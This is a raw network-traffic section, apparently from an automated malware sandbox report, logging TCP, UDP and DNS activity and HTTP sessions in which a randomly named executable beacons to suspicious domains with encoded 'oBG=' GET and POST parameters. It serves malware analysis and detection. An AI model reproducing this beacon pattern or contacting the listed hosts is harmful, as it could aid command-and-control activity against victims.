                                                            Jul 23, 2024 14:50:55.383033037 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:56.350893021 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.356910944 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:56.357012033 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.363245964 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:56.372555971 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:57.879865885 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:57.927018881 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.898284912 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.905639887 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.906070948 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.908078909 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:50:58.914150953 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:50:58.914161921 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:00.411005020 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:00.463511944 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:01.433624983 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.438631058 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:01.438709974 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.440617085 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:01.446243048 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:05.839711905 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.839759111 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:05.839845896 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.844100952 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:05.844114065 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.438000917 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.438262939 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.439696074 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.439708948 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.440038919 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:06.489029884 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.549534082 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:06.596508980 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.107754946 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.107985973 CEST4434975013.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:07.108047962 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:07.112519026 CEST49750443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.639904022 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.639966011 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:14.640037060 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.642648935 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:14.642666101 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.203219891 CEST804973943.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:15.203274965 CEST4973980192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:15.261159897 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.261245966 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.266640902 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.266663074 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.266913891 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.292572021 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.336496115 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877055883 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877136946 CEST4434975413.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:15.877279997 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:15.879303932 CEST49754443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:17.747431040 CEST804974243.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:17.747505903 CEST4974280192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:20.274478912 CEST804974443.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:20.274811029 CEST4974480192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.805660009 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:22.805881023 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.806612968 CEST4974680192.168.2.543.155.26.241
                                                            Jul 23, 2024 14:51:22.811463118 CEST804974643.155.26.241192.168.2.5
                                                            Jul 23, 2024 14:51:23.312710047 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.312762022 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.312827110 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.315661907 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.315701962 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.935415030 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.935489893 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.936965942 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:23.936986923 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.940880060 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:23.959203959 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:24.004498959 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.585530043 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.585627079 CEST4434975613.107.139.11192.168.2.5
                                                            Jul 23, 2024 14:51:24.586654902 CEST49756443192.168.2.513.107.139.11
                                                            Jul 23, 2024 14:51:24.588692904 CEST49756443192.168.2.513.107.139.11

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jul 23, 2024 14:49:17.384586096 CEST5816553192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:49:18.969913960 CEST5710853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:49:42.135776997 CEST5166353192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:05.526951075 CEST5036153192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:05.551574945 CEST53503611.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:08.347829103 CEST5333853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:10.573659897 CEST5234253192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:10.808659077 CEST53523421.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:20.560156107 CEST5168953192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:29.585359097 CEST6480053192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:31.536628962 CEST5788153192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:31.692128897 CEST53578811.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:39.837177992 CEST6298853192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:39.918812037 CEST53629881.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:50:53.352060080 CEST5802053192.168.2.51.1.1.1
                                                            Jul 23, 2024 14:50:53.818104982 CEST53580201.1.1.1192.168.2.5
                                                            Jul 23, 2024 14:51:24.631124973 CEST6354853192.168.2.51.1.1.1

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jul 23, 2024 14:49:17.384586096 CEST192.168.2.51.1.1.10x7d3cStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:49:18.969913960 CEST192.168.2.51.1.1.10xdc79Standard query (0)cdsf1g.db.files.1drv.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.135776997 CEST192.168.2.51.1.1.10x5577Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:05.526951075 CEST192.168.2.51.1.1.10x735eStandard query (0)www.gospelstudygroup.orgA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.347829103 CEST192.168.2.51.1.1.10x7a08Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:10.573659897 CEST192.168.2.51.1.1.10x5d9aStandard query (0)www.valerieomage.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:20.560156107 CEST192.168.2.51.1.1.10x2561Standard query (0)cdsf1g.db.files.1drv.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.585359097 CEST192.168.2.51.1.1.10xdd9fStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:31.536628962 CEST192.168.2.51.1.1.10xb9eeStandard query (0)www.instantmailer.cloudA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:39.837177992 CEST192.168.2.51.1.1.10x538dStandard query (0)www.kosherphonestore.comA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:53.352060080 CEST192.168.2.51.1.1.10xac64Standard query (0)www.cwgehkk.storeA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:51:24.631124973 CEST192.168.2.51.1.1.10xed02Standard query (0)cdsf1g.db.files.1drv.comA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jul 23, 2024 14:49:17.393198967 CEST1.1.1.1192.168.2.50x7d3cNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:17.393198967 CEST1.1.1.1192.168.2.50x7d3cNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:17.393198967 CEST1.1.1.1192.168.2.50x7d3cNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:17.393198967 CEST1.1.1.1192.168.2.50x7d3cNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:49:17.393198967 CEST1.1.1.1192.168.2.50x7d3cNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:49:19.091557026 CEST1.1.1.1192.168.2.50xdc79No error (0)cdsf1g.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:19.091557026 CEST1.1.1.1192.168.2.50xdc79No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.144566059 CEST1.1.1.1192.168.2.50x5577No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.144566059 CEST1.1.1.1192.168.2.50x5577No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.144566059 CEST1.1.1.1192.168.2.50x5577No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.144566059 CEST1.1.1.1192.168.2.50x5577No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:49:42.144566059 CEST1.1.1.1192.168.2.50x5577No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:05.551574945 CEST1.1.1.1192.168.2.50x735eName error (3)www.gospelstudygroup.orgnonenoneA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.989136934 CEST1.1.1.1192.168.2.50x7a08No error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.989136934 CEST1.1.1.1192.168.2.50x7a08No error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.989136934 CEST1.1.1.1192.168.2.50x7a08No error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.989136934 CEST1.1.1.1192.168.2.50x7a08No error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:08.989136934 CEST1.1.1.1192.168.2.50x7a08No error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:10.808659077 CEST1.1.1.1192.168.2.50x5d9aNo error (0)www.valerieomage.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:10.808659077 CEST1.1.1.1192.168.2.50x5d9aNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:20.606180906 CEST1.1.1.1192.168.2.50x2561No error (0)cdsf1g.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:20.606180906 CEST1.1.1.1192.168.2.50x2561No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.592626095 CEST1.1.1.1192.168.2.50xdd9fNo error (0)onedrive.live.comweb.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.592626095 CEST1.1.1.1192.168.2.50xdd9fNo error (0)web.fe.1drv.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.592626095 CEST1.1.1.1192.168.2.50xdd9fNo error (0)odwebpl.trafficmanager.net.dual-spov-0006.spov-msedge.netdual-spov-0006.spov-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.592626095 CEST1.1.1.1192.168.2.50xdd9fNo error (0)dual-spov-0006.spov-msedge.net13.107.139.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:29.592626095 CEST1.1.1.1192.168.2.50xdd9fNo error (0)dual-spov-0006.spov-msedge.net13.107.137.11A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:31.692128897 CEST1.1.1.1192.168.2.50xb9eeName error (3)www.instantmailer.cloudnonenoneA (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:39.918812037 CEST1.1.1.1192.168.2.50x538dNo error (0)www.kosherphonestore.comwww.kosherphonestore.com.cdn.hstgr.netCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:50:39.918812037 CEST1.1.1.1192.168.2.50x538dNo error (0)www.kosherphonestore.com.cdn.hstgr.net84.32.84.121A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:50:53.818104982 CEST1.1.1.1192.168.2.50xac64No error (0)www.cwgehkk.store43.155.26.241A (IP address)IN (0x0001)false
                                                            Jul 23, 2024 14:51:24.692011118 CEST1.1.1.1192.168.2.50xed02No error (0)cdsf1g.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                            Jul 23, 2024 14:51:24.692011118 CEST1.1.1.1192.168.2.50xed02No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • onedrive.live.com
                                                            • www.valerieomage.com
                                                            • www.kosherphonestore.com
                                                            • www.cwgehkk.store

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.54972223.227.38.74801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:10.832081079 CEST539OUTGET /c7rq/?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.valerieomage.com
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Jul 23, 2024 14:50:11.389540911 CEST1236INHTTP/1.1 301 Moved Permanently
                                                            Date: Tue, 23 Jul 2024 12:50:11 GMT
                                                            Content-Type: text/html; charset=utf-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Sorting-Hat-PodId: 223
                                                            X-Sorting-Hat-ShopId: 70582403296
                                                            X-Storefront-Renderer-Rendered: 1
                                                            location: https://valerieomage.com/c7rq?oBG=httm3UUwH6NnwSQhbzeVca8kqE5bj6YPstl+OFvVeu4EU857dyc7w4+qhgXRMO7PTzi/X2HMMMtdNC+wv2+smLAouLcyIEijMeq9ccv2ntai0EWGFrkjFC0U/c7k/DTDLA==&3F=ZLtxCXoX
                                                            x-redirect-reason: https_required
                                                            x-frame-options: DENY
                                                            content-security-policy: frame-ancestors 'none';
                                                            x-shopid: 70582403296
                                                            x-shardid: 223
                                                            vary: Accept
                                                            powered-by: Shopify
                                                            server-timing: processing;dur=13;desc="gc:1", db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="rp5m", requestID;desc="de436c6d-907f-46cb-b6a1-099ee3e8e05e-1721739011"
                                                            x-dc: gcp-us-east4,gcp-us-east1,gcp-us-east1
                                                            x-request-id: de436c6d-907f-46cb-b6a1-099ee3e8e05e-1721739011
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=njf6VDuA1IYmBYNk1xx0zPBEv05pAeOmb93ciyDhupxkTotAvWZNSknzFXuuiGfpAmBVNWELlye15h%2FMFnvsvlMPRirACWQms1FyD%2BbfT80Wy%2BRCbOdw%2FtNbuLNtZN1iyCiPhRBo"}],"group":"cf-nel","max_age":60480
                                                            Data Raw:
                                                            Data Ascii:
                                                            Jul 23, 2024 14:50:11.389564991 CEST343INData Raw: 7d 0d 0a 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69
                                                            Data Ascii: }NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=72.999716X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Opti


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.54972884.32.84.121801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:39.936696053 CEST819OUTPOST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 204
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 4b 62 46 6b 42 69 59 64 75 50 6f 34 2f 56 7a 48 6b 75 55 69 70 77 63 53 37 4e 4c 77 70 55 6b 45 51 41 2f 52 34 4f 6d 31 58 44 61 33 43 33 73 7a 76 44 6b 76 6c 43 6f 78 62 33 64 6c 79 7a 77 32 6f 69 6d 4d 31 71 50 50 64 32 65 48 63 2f 4f 31 66 77 74 77 61 6d 2f 67 52 71 7a 52 56 48 31 34 6d 4f 56 4f 6c 68 46 45 49 52 47 68 65 68 77 6b 38 4c 6d 4f 76 7a 70 78 38 4f 52 5a 58 41 69 35 50 4d 77 45 52 30 49 63 68 6c 71 30 50 41 6f 4e 50 76 2b 4d 34 31 46 52 5a 78 33 34 50 55 2b 57 46 78 43 7a 47 70 31 78 73 30 5a 52 59 59 50 30 4b 4e 4c 6a 36 4f 64 33 6b 59 3d
                                                            Data Ascii: oBG=QA6UYFT+ZhbfrKbFkBiYduPo4/VzHkuUipwcS7NLwpUkEQA/R4Om1XDa3C3szvDkvlCoxb3dlyzw2oimM1qPPd2eHc/O1fwtwam/gRqzRVH14mOVOlhFEIRGhehwk8LmOvzpx8ORZXAi5PMwER0Ichlq0PAoNPv+M41FRZx34PU+WFxCzGp1xs0ZRYYP0KNLj6Od3kY=
                                                            Jul 23, 2024 14:50:40.420574903 CEST1218INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:40 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 2aa70a4d74fdb6beba5b9b19f5ba2277-bos-edge1
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.001
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.54973084.32.84.121801600C:\Program Files (x86)\CYuCmafrUiRpexSXBCfMsfHtHOSokEaicfvwTqXQ\NQKKZTlEHzDNbnTfYhwoCSpWHN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jul 23, 2024 14:50:42.475423098 CEST839OUTPOST /ktbm/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Host: www.kosherphonestore.com
                                                            Origin: http://www.kosherphonestore.com
                                                            Referer: http://www.kosherphonestore.com/ktbm/
                                                            Content-Length: 224
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D257 Safari/9537.53
                                                            Data Raw: 6f 42 47 3d 51 41 36 55 59 46 54 2b 5a 68 62 66 72 71 48 46 6e 69 4b 59 4d 65 50 72 6b 76 56 7a 64 55 75 59 69 75 34 63 53 36 35 6c 77 62 77 6b 45 31 6b 2f 51 36 32 6d 34 33 44 61 76 53 32 6e 33 76 44 76 76 6c 4f 4b 78 62 37 64 6c 79 6e 77 32 71 36 6d 4d 43 2b 49 50 4e 32 63 4c 38 2f 4d 37 2f 77 74 77 61 6d 2f 67 52 75 5a 52 55 6a 31 35 58 2b 56 4f 45 67 54 48 49 52 46 33 4f 68 77 31 73 4c 69 4f 76 79 4f 78 39 6a 5a 5a 53 45 69 35 50 38 77 48 45 41 4c 54 68 6c 73 77 50 42 47 45 74 53 42 42 37 64 57 5a 62 35 77 6f 70 41 43 54 7a 63 6f 70 6b 68 64 69 4d 59 68 42 4c 51 34 6c 36 73 69 35 5a 65 74 70 7a 50 57 35 55 6e 73 63 61 30 62 32 64 58 74 64 72 4d 55 41 43 6e 41
                                                            Data Ascii: oBG=QA6UYFT+ZhbfrqHFniKYMePrkvVzdUuYiu4cS65lwbwkE1k/Q62m43DavS2n3vDvvlOKxb7dlynw2q6mMC+IPN2cL8/M7/wtwam/gRuZRUj15X+VOEgTHIRF3Ohw1sLiOvyOx9jZZSEi5P8wHEALThlswPBGEtSBB7dWZb5wopACTzcopkhdiMYhBLQ4l6si5ZetpzPW5Unsca0b2dXtdrMUACnA
                                                            Jul 23, 2024 14:50:42.942187071 CEST1218INHTTP/1.1 301 Moved Permanently
                                                            Server: hcdn
                                                            Date: Tue, 23 Jul 2024 12:50:42 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 795
                                                            Connection: close
                                                            location: https://www.kosherphonestore.com/ktbm/
                                                            platform: hostinger
                                                            content-security-policy: upgrade-insecure-requests
                                                            alt-svc: h3=":443"; ma=86400
                                                            x-hcdn-request-id: 104bbecd9a7e42ab875182146077952f-bos-edge1
                                                            x-hcdn-cache-status: DYNAMIC
                                                            x-hcdn-upstream-rt: 0.000
